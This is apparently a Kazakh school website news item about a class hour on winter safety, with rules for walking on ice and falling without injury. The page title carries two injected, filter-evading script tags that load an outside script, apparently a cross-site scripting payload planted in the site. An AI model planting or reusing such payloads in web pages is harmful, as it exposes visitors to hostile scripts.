Қыз мезгіліндегі кауіпсіздік ережелері<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.12.2020

 Балалардың қыс мезгілінде үйде, көшеде, табиғатта қауіпсіздік ережесін сақтай білу жөніндегі білімдерін бекіту мақсатында 1-9 сыныптарда «Қыс мезгіліндегі қауіпсіздік ережелері» тақырыбында сынып сағаты өтті.

Оқушыларға көктайғақ кезінде ескерілетін ережелер айтылды:

- Өзіңіздің аяқ киіміңізге көңіл аударыңыз:

- Аяқастына қараңыз, қауіпті жерлермен жүрмеңіз.

- Егер мұзды жерді айналып өту мүмкін болмаса, мұз үстімен шаңғышы сияқты қысқа адымдармен жүріңіз:

- Жолдың келесі бетке өтетін жерлерде абай болыңыз, асықпаңыз, жүгірмеңіз; 
- Аяғыңызды тізеден бос ұстап, табаңыңызды нық төсеп жүріңіз; 
- Қолды қалтаға салып жүру құлау қаупін ұлғайтады. 
- Егер тайып кетсеңіз ауыр жарақат алмас үшін, жүрелеп отыра қалуға тырысыңыз. 
- Құлаған кезде қатты соққы алмас үшін бүктетіліп, аунап түсуге тырысыңыз. 
- Құлаған кезде қолыңыздағы заттың емес, өзіңіздің аман қалуыңызды ойлаңыз. 
- Құлаған соң орныңыздан бірден көтерілмей, жарақат алмағаныңызға көз жеткізіп, жаныңыздағылардан көмек сұраңыз

 

Просмотров: 879


Пікір қосу



Деректерді қолтаңбаға қосу